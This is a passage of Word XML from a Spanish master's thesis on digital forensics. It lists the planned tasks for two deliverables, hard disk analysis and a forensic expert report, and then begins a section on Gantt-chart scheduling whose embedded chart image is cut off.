    <w:p w14:paraId="4C13226C" w14:textId="49A2142B" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Análisis de disco duro: Introducción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151C6938" w14:textId="2677AFDE" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Acciones previas al análisis de disco duro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFD56F7" w14:textId="1D7D276A" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Datos de interés y usuarios del sistema del disco duro analizado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFE48D3" w14:textId="49B0E56F" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Análisis de las evidencias del disco duro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083CB3AD" w14:textId="2C95D710" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Planning relativo al resumen ejecutivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC5B26A" w14:textId="706808FA" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Planning relativo al informe pericial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5A59B0" w14:textId="3C8CA34E" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Adaptación al </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>índice</w:t>
      </w:r>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a los nuevos cambios en los capítulos 6 y 7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472F6BDC" w14:textId="00C4F61D" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Refinamiento TFM 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E0D113" w14:textId="150E5812" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18" w:rsidP="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Durante la elaboración del reto </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PEC 3), se realizarán las siguientes tareas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3431F1B5" w14:textId="450412F9" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lectura enunciado actividad 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B128B03" w14:textId="7425B99A" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Introducción Resumen ejecutivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116BDF43" w14:textId="727EE034" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Análisis Ejecutivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7260D9D7" w14:textId="56ADEC8C" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusión de análisis ejecutivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0891F868" w14:textId="5AA057F6" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Refinamiento TFM 5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F36573" w14:textId="20DAA2D2" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Feedback de la PEC 02.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E87EB68" w14:textId="50C62C4C" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introducción del informe pericial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5ECD93" w14:textId="260574A0" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cuerpo del informe pericial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63013D3E" w14:textId="41F619B2" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusiones del informe pericial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4197603F" w14:textId="7BB9EC20" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusiones TFM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675419DD" w14:textId="0362EA55" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="005F4CA6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Revisión</w:t>
      </w:r>
      <w:r w:rsidR="00E82E18" w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de términos abreviaturas y acrónimos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20713058" w14:textId="12BD906A" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Revisión de imágenes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31585984" w14:textId="7E052E81" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="005F4CA6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>revisión</w:t>
      </w:r>
      <w:r w:rsidR="00E82E18" w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de referencias.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256EE39D" w14:textId="48C03600" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Refinamiento TFM 6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78334D3F" w14:textId="59FD56B7" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18" w:rsidP="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Durante la elaboración del reto </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PEC 4), se realizarán las siguientes tareas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4018F6" w14:textId="517F61E3" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Revisión de las anotaciones y consejos de la tutora de TFM 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650A9AE3" w14:textId="5BB66FE7" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ultimas correcciones Feedback TFM 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E4EAAD" w14:textId="6E6F60DB" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Revisión de las anotaciones y consejos de la tutora de TFM 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030BE47D" w14:textId="3CB1688C" w:rsidR="00E82E18" w:rsidRPr="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ultimas correcciones Feedback TFM 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8437FD" w14:textId="32251664" w:rsidR="00E82E18" w:rsidRDefault="00E82E18" w:rsidP="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E82E18">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La Entrega de videos, presentación y realización de la defensa del TFM, se consideran que están fuera de este TFM, ya que a partir de la fecha se considera entregado el presente documento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9E2F78" w14:textId="0C6FC6C8" w:rsidR="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0DB708" w14:textId="26CA0B00" w:rsidR="00E82E18" w:rsidRDefault="00000AAE" w:rsidP="00000AAE">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc155782501"/>
      <w:r w:rsidRPr="00000AAE">
        <w:t>1.6.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00000AAE">
        <w:t>Planificación temporal de las tareas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="422B3BBE" w14:textId="6CDB2D80" w:rsidR="00E82E18" w:rsidRDefault="00E82E18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47BA2688" w14:textId="69A905FE" w:rsidR="009F6921" w:rsidRDefault="009F6921" w:rsidP="009F6921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6921">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Para esta sección, se han elaborado los siguientes diagramas de Gantt</w:t>
      </w:r>
      <w:r w:rsidR="00487731">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C4092C" w14:textId="1169FEE4" w:rsidR="009F6921" w:rsidRPr="009F6921" w:rsidRDefault="00487731" w:rsidP="009F6921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251693056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0862593D" wp14:editId="280D007F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-1905</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>250190</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5830910" cy="1743710"/>
                <wp:effectExtent l="0" t="0" r="0" b="8890"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="669687448" name="Grupo 21"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5830910" cy="1743710"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5831564" cy="1743710"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="2002343163" name="Imagen 1" descr="Imagen que contiene Gráfico en cascada&#10;&#10;Descripción generada automáticamente"/>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093085" cy="1743710"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1909614336" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3208720" y="629729"/>
                            <a:ext cx="2622844" cy="283845"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="34494E92" w14:textId="7450C009" w:rsidR="007B14FB" w:rsidRPr="00332291" w:rsidRDefault="007B14FB" w:rsidP="007B14FB">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>4</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="15" w:name="_Toc155782571"/>
                              <w:r w:rsidRPr="002B54E4">
                                <w:t>Tareas relativas a la PEC 1 del TFM.</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862593D" id="Grupo 21" o:spid="_x0000_s1028" style="position:absolute;left:0;text-align:left;margin-left:-.15pt;margin-top:19.7pt;width:459.15pt;height:137.3pt;z-index:251693056;mso-width-relative:margin" coordsize="58315,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qrSrwMAAEUIAAAOAAAAZHJzL2Uyb0RvYy54bWycVdtu2zgQfV+g/0Cw&#10;wL41siTHsb1xCq+zCQIErbHpos80RVlEJZIlqdjp3/Qb9hPyY3tISbm5xbZ9sDy8zPDMmTPk6dt9&#10;U5NbYZ3UakHToxElQnFdSLVd0H8+XLyZUuI8UwWrtRILeiccfXv26rfTnZmLTFe6LoQlCKLcfGcW&#10;tPLezJPE8Uo0zB1pIxQWS20b5jG026SwbIfoTZ1ko9Ek2WlbGKu5cA6z590iPYvxy1Jw/74snfCk&#10;XlBg8/Fr43cTvsnZKZtvLTOV5D0M9gsoGiYVDn0Idc48I62VB6Eaya12uvRHXDeJLkvJRcwB2aSj&#10;F9lcWt2amMt2vtuaB5pA7Quefjksf3d7ac2NWVswsTNbcBFHIZd9aZvwD5RkHym7e6BM7D3hmDye&#10;5qNZCmY51tKTcX6CQSSVV2D+wI9Xfz16pseT8YFnMhycPINjJJ/j13MA64CD/9cKvHxrBe2DND8U&#10;o2H2U2veoFyGebmRtfR3UXooTAClbteSr203AJ1rS2SxoBBnlo/zdJJTolgD6V81bCsUSSkphOPQ&#10;YD/xuRWEa+WlUIJc2vuv0IRGFxHOHGcF+/31fvlH/JwHP2m4vP9XEcQSFsuEtV4391+95DhGeRHo&#10;D8AClg4ZC8xda/7JEaVXFVNbsXQGvYGShd3J8+1x+CytTS3NhazroIZg9wQihxc6/EYNOo2fa94G&#10;dF3TWlGDS61cJY2jxM5FsxEgzV4VERCbO2+F51U4sMTBfwNsAPpkIaJ8BBZScJDxjwoXss1H0+Pv&#10;yw+kWecvhW5IMAAOGFBzNme3165HM2zpOewARGTAExoKt5ob6MLogLCfatybihkBCCHso9LS2Wg2&#10;Scd5PhmUtmpZYTVkRjz6VENy4K53Cq1O/P5PjeZ9mP8OcXk2mp5kaG709iSbnWSzrrWH5s8mWTYd&#10;9y2cTfPp+DjKaejgn6QQxdW1LAahBW5XtSW3DHf3rpKdsoMEnu6qVSiJ0sGrU0iYwd3hejkEy+83&#10;+64rByY2urgDEVajsEjQGX4hcd41c37NLJ4ATOJZ8+/xKWu9W1DdW5RU2n751nzYjwJjlZIdnpQF&#10;dZ9bFu6b+kqh9AjpB8MOxmYwVNusNDLF/QA00YSD9fVgllY3H/HaLcMpWGKK46wF9YO58hhhAa8l&#10;F8tltLtr61rdGFx2aZRv4PXD/iOzphd2EMk7PYjrQN/d3sCyM0vcNRcyij/w2rHY0w2hRyu+VbCe&#10;PYZPx3HX4+t/9h8AAAD//wMAUEsDBAoAAAAAAAAAIQArWMCZO3MAADtzAAAUAAAAZHJzL21lZGlh&#10;L2ltYWdlMS5wbmeJUE5HDQoaCgAAAA1JSERSAAACJAAAATUIAgAAAFjzbIQAAAABc1JHQgCuzhzp&#10;AAAABGdBTUEAALGPC/xhBQAAAAlwSFlzAAAOwwAADsMBx2+oZAAActBJREFUeF7tnQlAFdX3x8GN&#10;RZFFXEHCFdxCCZV+iP7SXFs0IDekPTFalJ+ipolbtkj+EDUCtf4pWGp